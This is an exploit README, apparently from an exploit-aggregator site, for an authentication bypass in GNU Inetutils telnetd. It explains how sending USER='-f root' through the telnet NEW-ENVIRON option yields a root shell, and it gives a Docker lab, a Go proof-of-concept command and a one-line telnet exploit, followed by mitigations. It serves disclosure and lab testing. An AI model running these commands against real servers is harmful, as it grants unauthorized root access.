Share
## https://sploitus.com/exploit?id=1D9206CE-65DC-545E-A96E-2EF93A7EC9BA
# CVE-2026-24061

## GNU Inetutils telnetd Remote Authentication Bypass

> **Seriously, telnet in 2026? Come on guys, it's time to move on. SSH exists since 1995.** ๐Ÿคฆ

### Description

A critical authentication bypass vulnerability in GNU Inetutils telnetd affecting versions 1.9.3 through 2.7.

The vulnerability exploits the NEW-ENVIRON telnet option to inject malicious arguments into `login(1)`. By setting `USER=-f root` via the telnet protocol, an attacker can bypass authentication and obtain a root shell without credentials.

### Affected Versions

- GNU Inetutils 1.9.3 - 2.7

### Technical Details

The telnet protocol supports the NEW-ENVIRON option (RFC 1572) which allows the client to send environment variables to the server. The `telnetd` daemon passes the USER variable to `login(1)` as an argument.

By sending `USER=-f root`, the value is interpreted as:
- `-f` flag: Skip authentication (trusted host)
- `root`: Target user

This causes `login -f root` to be executed, granting immediate root access.

The PoC detects successful exploitation by checking for `IAC WILL ECHO` (0xff 0xfb 0x01) - the protocol signal that the server sends when shell access is granted.

### Lab Setup

```bash
# Build and run the vulnerable telnetd container
docker compose up --build -d

# Test the exploit
go run poc.go 127.0.0.1 2323
```

### Exploitation

```bash
# Using the Go PoC (with interactive shell)
go run poc.go  

# Simple PoC using standard telnet client
env USER='-f root' telnet -a  
```

### Mitigation

- **Stop using telnet in 2026, for real** ๐Ÿ™
- Use SSH instead (it's been around for 31 years now, I wasn't even born in '95 lol)
- Upgrade to a patched version of GNU Inetutils
- Restrict telnet access via firewall rules

### Files

- `poc.go` - Go exploit with interactive shell
- `Dockerfile` - Vulnerable telnetd container
- `docker-compose.yml` - Lab orchestration

### References

- Advisory: https://www.openwall.com/lists/oss-security/2026/01/20/2
- GNU Inetutils: https://www.gnu.org/software/inetutils/
- RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572

### Credits

- LeakIX Research Team